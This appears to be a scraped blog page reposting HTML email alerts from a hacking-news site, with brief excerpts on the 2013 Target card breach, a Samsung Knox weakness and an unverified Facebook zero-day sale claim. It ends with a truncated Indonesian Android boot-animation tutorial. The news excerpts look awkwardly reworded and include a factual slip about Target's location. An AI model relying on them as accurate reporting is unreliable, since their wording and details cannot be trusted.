A Little Piece of n00b

[New post] The top 10 most important hacks of 2013

<table border="0" cellspacing="0" cellpadding="0" bgcolor="#DDDDDD" style="width: 100%; background: #DDDDDD;"> 	<tr> 		<td> 					 				HNBulletin posted: " Over in the States previous week, Christmas buyers got an undesirable shock when it was exposed that a waiting scam resulted in the robbery of up to 40 million debit and credit card numbers commencing from a Target customers. The retailer insisted on c"			 						<table border="0" cellspacing="0" cellpadding="0" align='center' class="subscribe-body" style="width: 100%; padding: 10px"> 				<tr> 					<td> 												<div style="max-width: 600px; margin: 0 auto; overflow: hidden;"> 							<table border="0" cellspacing="0" cellpadding="0" bgcolor="#ffffff" class="subscribe-wrapper" style="width: 100%; background-color: #fff; text-align: left; max-width: 1024px; min-width: 320px; margin: 0 auto;"> 								<tr> 									<td> 										<table border="0" cellspacing="0" cellpadding="0" height="8" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-header-wrap" style="width: 100%; background-image: url(http:/s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 8px;"> 											<tr> 												<td></td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="0" class="subscribe-header" style="width: 100%; color: #08c; font-size: 1.6em; background-color: #EFEFEF; border-bottom: 1px solid #DDD; margin: 0; padding: 0;"> 											<tr> 												<td> 													<h2 class="subscribe-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 16px!important; line-height: 1; font-weight: 400; color: #464646; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 5px 20px!important; padding: 0;"> 														New post on Hackers News Bulletin													</h2> 												</td> 												<td style="text-align: right;"> 													<img alt="" border="0" class="head-avatar" src="http://s.wordpress.com/i/emails/blavatar-default.png"> 												</td> 											</tr> 										</table> 										<table style="width: 100%" border="0" cellspacing="0" cellpadding="20" bgcolor="#ffffff"> 											<tr> 												<td> 													<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 														<tr> 															<td valign="top" class="the-post"> 																																	<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 																		<tr> 																			<td style="width: 60px !important; white-space: nowrap; vertical-align: top;"> 																				<a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; display: block; margin-right: 10px;"><img alt="" border="0" class="avatar avatar-50" height="50" src="http://1.gravatar.com/avatar/1d9a1c1de2e1f989e9d28e07445be7b6?s=50&d=identicon&r=G" width="50" /></a> 																			</td> 																			<td> 																				<h2 class="post-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 1.6em; color: #555; margin: 0; font-size: 20px;"><a href="http://hackersnewsbulletin.com/2013/12/top-10-important-hacks-2013.html" style="text-decoration: underline; color: #2585B2; text-decoration: none !important;">The top 10 most important hacks of 2013</a></h2> 																				by <a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; color: #888 !important;">HNBulletin</a> 																			</td> 																		</tr> 																	</table> 																 																<div style="margin-top: 1em; max-width: 560px;" class="post-content"> 																																			Over in the States previous week, Christmas buyers got an undesirable shock when it was exposed that a waiting scam resulted in the robbery of up to 40 million debit and credit card numbers commencing from a Target customers. The retailer insisted on consumers to carry on a close eye on their testimonials in addition to credit […] <a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/top-10-important-hacks-2013.html">Read more of this post</a> <div style="clear: both"></div>																																	</div> 																																	<div class="meta" style="color: #999; font-size: .9em; margin-top: 4px; line-height: 160%; padding: 15px 0 15px; border-top: 1px solid #eee; border-bottom: 1px solid #eee; overflow: hidden"> 																		<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/?author=1">HNBulletin</a> | December 28, 2013 at 3:11 pm | URL: <a style="text-decoration: underline; color: #2585B2;" href="http://wp.me/p3En2r-1XR">http://wp.me/p3En2r-1XR</a>																	</div> 																 															 																<p class="subscribe-action-links" style="font-size: 14px; line-height: 1.4em; color: #444; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 0 0 1em; font-size: 14px; color: #666; padding: 0; width: auto; padding-top: 1em; padding-bottom: 0em; margin-bottom: 0; margin-left: 0; padding-left: 0;"> 																	<table class="auto-width" border="0" cellspacing="0" cellpadding="0" style="width: 100%; width: auto"> 																		<tr> 																			<td style="width: 10px;"><a href="http://hackersnewsbulletin.com/2013/12/top-10-important-hacks-2013.html#respond" style="text-decoration: underline; color: #2585B2; -moz-border-radius: 10em; -webkit-border-radius: 10em; border-radius: 10em; border: 1px solid #11729E; text-decoration: none; color: #fff; text-shadow: 0 1px 0 #11729E; background-color: #2585B2; padding: 5px 15px; font-size: 16px; line-height: 1.4em; font-family: Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: normal; margin-left: 0; white-space: nowrap;">Comment</a></td> 																																					<td>   <a class="subscribe-action-link" href="http://hackersnewsbulletin.com/2013/12/top-10-important-hacks-2013.html#comments" style="text-decoration: underline; color: #2585B2; text-decoration: underline">See all comments</a></td> 																																																						</tr> 																	</table> 																 																														</td> 														</tr> 													</table> 												</td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="20" bgcolor="#efefef" class="subscribe-wrapper-sub" style="width: 100%; background-color: #efefef; text-align: left; border-top: 1px solid #ddd;"> 											<tr> 												<td class="subscribe-content" style="border-top: 1px solid #f3f3f3; color: #888; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; background: #efefef;"> 													 														<a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com&b=L2R7Az5FyPh9%25hTJ%264lCVY%26pldTWOFpKP1%5BS4%7CXrqjS2U%25nGn%5B">Unsubscribe</a> to no longer receive posts from Hackers News Bulletin. 														Change your email settings at <a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com">Manage Subscriptions</a>.													 													 														Trouble clicking? Copy and paste this URL into your browser: 														<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/top-10-important-hacks-2013.html">http://hackersnewsbulletin.com/2013/12/top-10-important-hacks-2013.html</a> 													 												</td> 											</tr> 										</table> 									</td> 								</tr> 							</table> 							<table border="0" cellspacing="0" cellpadding="0" height="3" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-footer-wrap" style="width: 100%; background-image: url(http://s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 3px;"> 								<tr> 									<td></td> 								</tr> 							</table> 						</div> 					</td> 				</tr> 			</table> 			 			 		</td> 	</tr> </table> <img alt="" border="0" height="1" src="http://stats.wordpress.com/b.gif?host=jetpack.wordpress.com&blog=53950691&post=7555&subd=hackersnewsbulletin.com&ref=&email=1&email_o=jetpack" width="1" />

[New post] The top 10 most important hacks of 2013

HNBulletin posted: " Over in the States previous week, Christmas buyers got an undesirable shock when it was exposed that a waiting scam resulted in the robbery of up to 40 million de…

28 Dec 2013

[New post] Source: Target hackers stole bank’s encrypted PIN

<table border="0" cellspacing="0" cellpadding="0" bgcolor="#DDDDDD" style="width: 100%; background: #DDDDDD;"> 	<tr> 		<td> 					 				HNBulletin posted: " Target Corp of New York was attacked and hacked by hackers' thereby compromising upto 40 million credit and debit cards also managed to steal the encrypted Personal Identification Number (PIN). Molly Snyder, the Target spokesperson said "no unencrypted "			 						<table border="0" cellspacing="0" cellpadding="0" align='center' class="subscribe-body" style="width: 100%; padding: 10px"> 				<tr> 					<td> 												<div style="max-width: 600px; margin: 0 auto; overflow: hidden;"> 							<table border="0" cellspacing="0" cellpadding="0" bgcolor="#ffffff" class="subscribe-wrapper" style="width: 100%; background-color: #fff; text-align: left; max-width: 1024px; min-width: 320px; margin: 0 auto;"> 								<tr> 									<td> 										<table border="0" cellspacing="0" cellpadding="0" height="8" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-header-wrap" style="width: 100%; background-image: url(http:/s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 8px;"> 											<tr> 												<td></td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="0" class="subscribe-header" style="width: 100%; color: #08c; font-size: 1.6em; background-color: #EFEFEF; border-bottom: 1px solid #DDD; margin: 0; padding: 0;"> 											<tr> 												<td> 													<h2 class="subscribe-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 16px!important; line-height: 1; font-weight: 400; color: #464646; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 5px 20px!important; padding: 0;"> 														New post on Hackers News Bulletin													</h2> 												</td> 												<td style="text-align: right;"> 													<img alt="" border="0" class="head-avatar" src="http://s.wordpress.com/i/emails/blavatar-default.png"> 												</td> 											</tr> 										</table> 										<table style="width: 100%" border="0" cellspacing="0" cellpadding="20" bgcolor="#ffffff"> 											<tr> 												<td> 													<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 														<tr> 															<td valign="top" class="the-post"> 																																	<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 																		<tr> 																			<td style="width: 60px !important; white-space: nowrap; vertical-align: top;"> 																				<a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; display: block; margin-right: 10px;"><img alt="" border="0" class="avatar avatar-50" height="50" src="http://1.gravatar.com/avatar/1d9a1c1de2e1f989e9d28e07445be7b6?s=50&d=identicon&r=G" width="50" /></a> 																			</td> 																			<td> 																				<h2 class="post-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 1.6em; color: #555; margin: 0; font-size: 20px;"><a href="http://hackersnewsbulletin.com/2013/12/source-target-hackers-stole-banks-encrypted-pin.html" style="text-decoration: underline; color: #2585B2; text-decoration: none !important;">Source: Target hackers stole bank’s encrypted PIN</a></h2> 																				by <a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; color: #888 !important;">HNBulletin</a> 																			</td> 																		</tr> 																	</table> 																 																<div style="margin-top: 1em; max-width: 560px;" class="post-content"> 																																			Target Corp of New York was attacked and hacked by hackers' thereby compromising upto 40 million credit and debit cards also managed to steal the encrypted Personal Identification Number (PIN). Molly Snyder, the Target spokesperson said "no unencrypted PIN data was accessed" and there was no evidence that PIN data has been "compromised." She confirmed […] <a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/source-target-hackers-stole-banks-encrypted-pin.html">Read more of this post</a> <div style="clear: both"></div>																																	</div> 																																	<div class="meta" style="color: #999; font-size: .9em; margin-top: 4px; line-height: 160%; padding: 15px 0 15px; border-top: 1px solid #eee; border-bottom: 1px solid #eee; overflow: hidden"> 																		<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/?author=1">HNBulletin</a> | December 26, 2013 at 12:23 pm | URL: <a style="text-decoration: underline; color: #2585B2;" href="http://wp.me/p3En2r-1XJ">http://wp.me/p3En2r-1XJ</a>																	</div> 																 															 																<p class="subscribe-action-links" style="font-size: 14px; line-height: 1.4em; color: #444; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 0 0 1em; font-size: 14px; color: #666; padding: 0; width: auto; padding-top: 1em; padding-bottom: 0em; margin-bottom: 0; margin-left: 0; padding-left: 0;"> 																	<table class="auto-width" border="0" cellspacing="0" cellpadding="0" style="width: 100%; width: auto"> 																		<tr> 																			<td style="width: 10px;"><a href="http://hackersnewsbulletin.com/2013/12/source-target-hackers-stole-banks-encrypted-pin.html#respond" style="text-decoration: underline; color: #2585B2; -moz-border-radius: 10em; -webkit-border-radius: 10em; border-radius: 10em; border: 1px solid #11729E; text-decoration: none; color: #fff; text-shadow: 0 1px 0 #11729E; background-color: #2585B2; padding: 5px 15px; font-size: 16px; line-height: 1.4em; font-family: Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: normal; margin-left: 0; white-space: nowrap;">Comment</a></td> 																																					<td>   <a class="subscribe-action-link" href="http://hackersnewsbulletin.com/2013/12/source-target-hackers-stole-banks-encrypted-pin.html#comments" style="text-decoration: underline; color: #2585B2; text-decoration: underline">See all comments</a></td> 																																																						</tr> 																	</table> 																 																														</td> 														</tr> 													</table> 												</td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="20" bgcolor="#efefef" class="subscribe-wrapper-sub" style="width: 100%; background-color: #efefef; text-align: left; border-top: 1px solid #ddd;"> 											<tr> 												<td class="subscribe-content" style="border-top: 1px solid #f3f3f3; color: #888; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; background: #efefef;"> 													 														<a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com&b=LaQe7Vx8lGGCce%2B16.lsuGv5Oekz8bZVTHs%7E2%5DtI-H-PiWtDv%26S">Unsubscribe</a> to no longer receive posts from Hackers News Bulletin. 														Change your email settings at <a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com">Manage Subscriptions</a>.													 													 														Trouble clicking? Copy and paste this URL into your browser: 														<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/source-target-hackers-stole-banks-encrypted-pin.html">http://hackersnewsbulletin.com/2013/12/source-target-hackers-stole-banks-encrypted-pin.html</a> 													 												</td> 											</tr> 										</table> 									</td> 								</tr> 							</table> 							<table border="0" cellspacing="0" cellpadding="0" height="3" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-footer-wrap" style="width: 100%; background-image: url(http://s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 3px;"> 								<tr> 									<td></td> 								</tr> 							</table> 						</div> 					</td> 				</tr> 			</table> 			 			 		</td> 	</tr> </table> <img alt="" border="0" height="1" src="http://stats.wordpress.com/b.gif?host=jetpack.wordpress.com&blog=53950691&post=7547&subd=hackersnewsbulletin.com&ref=&email=1&email_o=jetpack" width="1" />

[New post] Source: Target hackers stole bank’s encrypted PIN

HNBulletin posted: " Target Corp of New York was attacked and hacked by hackers' thereby compromising upto 40 million credit and debit cards also managed to steal the encrypted Person…

26 Dec 2013

[New post] Samsung Galaxy S4 is vulnerable to hackers

<table border="0" cellspacing="0" cellpadding="0" bgcolor="#DDDDDD" style="width: 100%; background: #DDDDDD;"> 	<tr> 		<td> 					 				HNBulletin posted: " According to Israeli-Ben-Gurion University security researchers, the most popular and secure Smart phone Samsung Galaxy S4 is not "so-secure" from Hackers. The much-vaunted enterprise software Samsung Knox is the security software basically the "Containe"			 						<table border="0" cellspacing="0" cellpadding="0" align='center' class="subscribe-body" style="width: 100%; padding: 10px"> 				<tr> 					<td> 												<div style="max-width: 600px; margin: 0 auto; overflow: hidden;"> 							<table border="0" cellspacing="0" cellpadding="0" bgcolor="#ffffff" class="subscribe-wrapper" style="width: 100%; background-color: #fff; text-align: left; max-width: 1024px; min-width: 320px; margin: 0 auto;"> 								<tr> 									<td> 										<table border="0" cellspacing="0" cellpadding="0" height="8" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-header-wrap" style="width: 100%; background-image: url(http:/s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 8px;"> 											<tr> 												<td></td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="0" class="subscribe-header" style="width: 100%; color: #08c; font-size: 1.6em; background-color: #EFEFEF; border-bottom: 1px solid #DDD; margin: 0; padding: 0;"> 											<tr> 												<td> 													<h2 class="subscribe-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 16px!important; line-height: 1; font-weight: 400; color: #464646; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 5px 20px!important; padding: 0;"> 														New post on Hackers News Bulletin													</h2> 												</td> 												<td style="text-align: right;"> 													<img alt="" border="0" class="head-avatar" src="http://s.wordpress.com/i/emails/blavatar-default.png"> 												</td> 											</tr> 										</table> 										<table style="width: 100%" border="0" cellspacing="0" cellpadding="20" bgcolor="#ffffff"> 											<tr> 												<td> 													<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 														<tr> 															<td valign="top" class="the-post"> 																																	<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 																		<tr> 																			<td style="width: 60px !important; white-space: nowrap; vertical-align: top;"> 																				<a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; display: block; margin-right: 10px;"><img alt="" border="0" class="avatar avatar-50" height="50" src="http://1.gravatar.com/avatar/1d9a1c1de2e1f989e9d28e07445be7b6?s=50&d=identicon&r=G" width="50" /></a> 																			</td> 																			<td> 																				<h2 class="post-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 1.6em; color: #555; margin: 0; font-size: 20px;"><a href="http://hackersnewsbulletin.com/2013/12/samsung-galaxy-s4-vulnerable-hackers.html" style="text-decoration: underline; color: #2585B2; text-decoration: none !important;">Samsung Galaxy S4 is vulnerable to hackers</a></h2> 																				by <a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; color: #888 !important;">HNBulletin</a> 																			</td> 																		</tr> 																	</table> 																 																<div style="margin-top: 1em; max-width: 560px;" class="post-content"> 																																			According to Israeli-Ben-Gurion University security researchers, the most popular and secure Smart phone Samsung Galaxy S4 is not "so-secure" from Hackers. The much-vaunted enterprise software Samsung Knox is the security software basically the "Container" in Samsung Galaxy S4 which prevents from unauthorized access but this container is vulnerable to hackers. They break the security breaches. The reported […] <a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/samsung-galaxy-s4-vulnerable-hackers.html">Read more of this post</a> <div style="clear: both"></div>																																	</div> 																																	<div class="meta" style="color: #999; font-size: .9em; margin-top: 4px; line-height: 160%; padding: 15px 0 15px; border-top: 1px solid #eee; border-bottom: 1px solid #eee; overflow: hidden"> 																		<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/?author=1">HNBulletin</a> | December 26, 2013 at 12:07 pm | URL: <a style="text-decoration: underline; color: #2585B2;" href="http://wp.me/p3En2r-1XE">http://wp.me/p3En2r-1XE</a>																	</div> 																 															 																<p class="subscribe-action-links" style="font-size: 14px; line-height: 1.4em; color: #444; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 0 0 1em; font-size: 14px; color: #666; padding: 0; width: auto; padding-top: 1em; padding-bottom: 0em; margin-bottom: 0; margin-left: 0; padding-left: 0;"> 																	<table class="auto-width" border="0" cellspacing="0" cellpadding="0" style="width: 100%; width: auto"> 																		<tr> 																			<td style="width: 10px;"><a href="http://hackersnewsbulletin.com/2013/12/samsung-galaxy-s4-vulnerable-hackers.html#respond" style="text-decoration: underline; color: #2585B2; -moz-border-radius: 10em; -webkit-border-radius: 10em; border-radius: 10em; border: 1px solid #11729E; text-decoration: none; color: #fff; text-shadow: 0 1px 0 #11729E; background-color: #2585B2; padding: 5px 15px; font-size: 16px; line-height: 1.4em; font-family: Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: normal; margin-left: 0; white-space: nowrap;">Comment</a></td> 																																					<td>   <a class="subscribe-action-link" href="http://hackersnewsbulletin.com/2013/12/samsung-galaxy-s4-vulnerable-hackers.html#comments" style="text-decoration: underline; color: #2585B2; text-decoration: underline">See all comments</a></td> 																																																						</tr> 																	</table> 																 																														</td> 														</tr> 													</table> 												</td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="20" bgcolor="#efefef" class="subscribe-wrapper-sub" style="width: 100%; background-color: #efefef; text-align: left; border-top: 1px solid #ddd;"> 											<tr> 												<td class="subscribe-content" style="border-top: 1px solid #f3f3f3; color: #888; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; background: #efefef;"> 													 														<a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com&b=LS%3DG%3Fj%2FkC_%2FYnp%5Dzpg8b9y%2Bugc2yAlV%2BQWSw%25M.l%2FaSy%2BTl4T%25I">Unsubscribe</a> to no longer receive posts from Hackers News Bulletin. 														Change your email settings at <a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com">Manage Subscriptions</a>.													 													 														Trouble clicking? Copy and paste this URL into your browser: 														<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/samsung-galaxy-s4-vulnerable-hackers.html">http://hackersnewsbulletin.com/2013/12/samsung-galaxy-s4-vulnerable-hackers.html</a> 													 												</td> 											</tr> 										</table> 									</td> 								</tr> 							</table> 							<table border="0" cellspacing="0" cellpadding="0" height="3" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-footer-wrap" style="width: 100%; background-image: url(http://s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 3px;"> 								<tr> 									<td></td> 								</tr> 							</table> 						</div> 					</td> 				</tr> 			</table> 			 			 		</td> 	</tr> </table> <img alt="" border="0" height="1" src="http://stats.wordpress.com/b.gif?host=jetpack.wordpress.com&blog=53950691&post=7542&subd=hackersnewsbulletin.com&ref=&email=1&email_o=jetpack" width="1" />

[New post] Samsung Galaxy S4 is vulnerable to hackers

HNBulletin posted: " According to Israeli-Ben-Gurion University security researchers, the most popular and secure Smart phone Samsung Galaxy S4 is not "so-secure" from Hackers. The muc…

26 Dec 2013

[New post] Zero-Day Exploit for sale, which claims to Delete admin of any Facebook page

<table border="0" cellspacing="0" cellpadding="0" bgcolor="#DDDDDD" style="width: 100%; background: #DDDDDD;"> 	<tr> 		<td> 					 				HNBulletin posted: " An Indian hacker named Varun contacted us through email and claimed to delete the admin of any Facebook page through a Zero-Day Facebook Exploit. Well, we were also shocked after viewing the mail and we tried every effort to verify the claim, but till n"			 						<table border="0" cellspacing="0" cellpadding="0" align='center' class="subscribe-body" style="width: 100%; padding: 10px"> 				<tr> 					<td> 												<div style="max-width: 600px; margin: 0 auto; overflow: hidden;"> 							<table border="0" cellspacing="0" cellpadding="0" bgcolor="#ffffff" class="subscribe-wrapper" style="width: 100%; background-color: #fff; text-align: left; max-width: 1024px; min-width: 320px; margin: 0 auto;"> 								<tr> 									<td> 										<table border="0" cellspacing="0" cellpadding="0" height="8" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-header-wrap" style="width: 100%; background-image: url(http:/s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 8px;"> 											<tr> 												<td></td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="0" class="subscribe-header" style="width: 100%; color: #08c; font-size: 1.6em; background-color: #EFEFEF; border-bottom: 1px solid #DDD; margin: 0; padding: 0;"> 											<tr> 												<td> 													<h2 class="subscribe-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 16px!important; line-height: 1; font-weight: 400; color: #464646; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 5px 20px!important; padding: 0;"> 														New post on Hackers News Bulletin													</h2> 												</td> 												<td style="text-align: right;"> 													<img alt="" border="0" class="head-avatar" src="http://s.wordpress.com/i/emails/blavatar-default.png"> 												</td> 											</tr> 										</table> 										<table style="width: 100%" border="0" cellspacing="0" cellpadding="20" bgcolor="#ffffff"> 											<tr> 												<td> 													<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 														<tr> 															<td valign="top" class="the-post"> 																																	<table style="width: 100%" border="0" cellspacing="0" cellpadding="0"> 																		<tr> 																			<td style="width: 60px !important; white-space: nowrap; vertical-align: top;"> 																				<a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; display: block; margin-right: 10px;"><img alt="" border="0" class="avatar avatar-50" height="50" src="http://1.gravatar.com/avatar/1d9a1c1de2e1f989e9d28e07445be7b6?s=50&d=identicon&r=G" width="50" /></a> 																			</td> 																			<td> 																				<h2 class="post-title" style="margin: .4em 0 .3em; font-size: 1.8em; font-size: 1.6em; color: #555; margin: 0; font-size: 20px;"><a href="http://hackersnewsbulletin.com/2013/12/zero-day-exploit-sale-claims-delete-admin-facebook-page.html" style="text-decoration: underline; color: #2585B2; text-decoration: none !important;">Zero-Day Exploit for sale, which claims to Delete admin of any Facebook page</a></h2> 																				by <a href="http://hackersnewsbulletin.com/?author=1" style="text-decoration: underline; color: #2585B2; color: #888 !important;">HNBulletin</a> 																			</td> 																		</tr> 																	</table> 																 																<div style="margin-top: 1em; max-width: 560px;" class="post-content"> 																																			An Indian hacker named Varun contacted us through email and claimed to delete the admin of any Facebook page through a Zero-Day Facebook Exploit. Well, we were also shocked after viewing the mail and we tried every effort to verify the claim, but till now at the time of publishing we were unable to verify […] <a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/zero-day-exploit-sale-claims-delete-admin-facebook-page.html">Read more of this post</a> <div style="clear: both"></div>																																	</div> 																																	<div class="meta" style="color: #999; font-size: .9em; margin-top: 4px; line-height: 160%; padding: 15px 0 15px; border-top: 1px solid #eee; border-bottom: 1px solid #eee; overflow: hidden"> 																		<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/?author=1">HNBulletin</a> | December 23, 2013 at 5:31 pm | URL: <a style="text-decoration: underline; color: #2585B2;" href="http://wp.me/p3En2r-1Xi">http://wp.me/p3En2r-1Xi</a>																	</div> 																 															 																<p class="subscribe-action-links" style="font-size: 14px; line-height: 1.4em; color: #444; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 0 0 1em; font-size: 14px; color: #666; padding: 0; width: auto; padding-top: 1em; padding-bottom: 0em; margin-bottom: 0; margin-left: 0; padding-left: 0;"> 																	<table class="auto-width" border="0" cellspacing="0" cellpadding="0" style="width: 100%; width: auto"> 																		<tr> 																			<td style="width: 10px;"><a href="http://hackersnewsbulletin.com/2013/12/zero-day-exploit-sale-claims-delete-admin-facebook-page.html#respond" style="text-decoration: underline; color: #2585B2; -moz-border-radius: 10em; -webkit-border-radius: 10em; border-radius: 10em; border: 1px solid #11729E; text-decoration: none; color: #fff; text-shadow: 0 1px 0 #11729E; background-color: #2585B2; padding: 5px 15px; font-size: 16px; line-height: 1.4em; font-family: Helvetica Neue, Helvetica, Arial, sans-serif; font-weight: normal; margin-left: 0; white-space: nowrap;">Comment</a></td> 																																					<td>   <a class="subscribe-action-link" href="http://hackersnewsbulletin.com/2013/12/zero-day-exploit-sale-claims-delete-admin-facebook-page.html#comments" style="text-decoration: underline; color: #2585B2; text-decoration: underline">See all comments</a></td> 																																																						</tr> 																	</table> 																 																														</td> 														</tr> 													</table> 												</td> 											</tr> 										</table> 										<table border="0" cellspacing="0" cellpadding="20" bgcolor="#efefef" class="subscribe-wrapper-sub" style="width: 100%; background-color: #efefef; text-align: left; border-top: 1px solid #ddd;"> 											<tr> 												<td class="subscribe-content" style="border-top: 1px solid #f3f3f3; color: #888; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; background: #efefef;"> 													 														<a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com&b=LCh3xXi8Y76pF.CrG.ag1UBac53q%25RvT-ETx%3DQe%26%5Dn%2F%26iNrhLsS">Unsubscribe</a> to no longer receive posts from Hackers News Bulletin. 														Change your email settings at <a style="text-decoration: underline; color: #2585B2;" href="https://subscribe.wordpress.com/?key=4b5dcf140cbc0cd8cd0c917f21a644bf&email=paradic3z.autopost%40blogger.com">Manage Subscriptions</a>.													 													 														Trouble clicking? Copy and paste this URL into your browser: 														<a style="text-decoration: underline; color: #2585B2;" href="http://hackersnewsbulletin.com/2013/12/zero-day-exploit-sale-claims-delete-admin-facebook-page.html">http://hackersnewsbulletin.com/2013/12/zero-day-exploit-sale-claims-delete-admin-facebook-page.html</a> 													 												</td> 											</tr> 										</table> 									</td> 								</tr> 							</table> 							<table border="0" cellspacing="0" cellpadding="0" height="3" background="http:/s.wordpress.com/i/emails/stripes.gif" class="subscribe-footer-wrap" style="width: 100%; background-image: url(http://s.wordpress.com/i/emails/stripes.gif); background-repeat: repeat-x; background-color: #43A4D0; height: 3px;"> 								<tr> 									<td></td> 								</tr> 							</table> 						</div> 					</td> 				</tr> 			</table> 			 			 		</td> 	</tr> </table> <img alt="" border="0" height="1" src="http://stats.wordpress.com/b.gif?host=jetpack.wordpress.com&blog=53950691&post=7520&subd=hackersnewsbulletin.com&ref=&email=1&email_o=jetpack" width="1" />

[New post] Zero-Day Exploit for sale, which claims to Delete admin of any Facebook page

HNBulletin posted: " An Indian hacker named Varun contacted us through email and claimed to delete the admin of any Facebook page through a Zero-Day Facebook Exploit. Well, we were al…

23 Dec 2013

Tutor Membuat Boot Animation Android

Alat dan bahan yang perlu disiapin : 
- Image Editor, misal Photoshop. ente bebas mau pake software apa aja buat bikin gambar bootanimation. 
- Archiver/Compressing Tool, misal Winrar. buat ng'bundle gambar yang mau dijadiin bootanimation. 
 
Langkah-langkahnya : 
1. Buat 2 buah folder dengan nama "Part0", "Part1" dan 1 buah file berformat *.txt dengan nama desc.txt 
 
2. Buat beberapa gambar berformat *.png
 dengan ukuran sesuai layar Android yang ente punya. contohnya XPERIA E 
Dual yg ukuran layarnya 320 x 480 pixel. Ini adalah contoh gambar yang 
ane buat (sebenernya ga buat sih, ini ngedit :ngakak 
 
